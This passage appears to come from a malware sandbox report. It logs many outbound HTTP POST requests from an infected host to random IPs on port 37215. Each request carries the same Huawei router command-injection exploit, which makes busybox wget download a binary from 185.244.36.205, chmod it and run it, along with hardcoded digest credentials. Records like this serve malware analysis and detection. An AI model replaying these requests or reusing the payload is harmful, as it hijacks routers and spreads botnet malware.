                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1038192.168.2.1546710204.23.174.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928915024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1039192.168.2.155205645.74.118.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928951025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1040192.168.2.1539022157.32.215.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928953886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1041192.168.2.1536538190.113.176.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928972006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1042192.168.2.154567445.177.43.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928987980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1043192.168.2.1537882197.40.94.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929008007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1044192.168.2.1560418156.156.1.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929052114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1045192.168.2.156094094.141.130.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929054022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1046192.168.2.155898094.141.97.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929083109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1047192.168.2.153915645.152.188.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929090023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
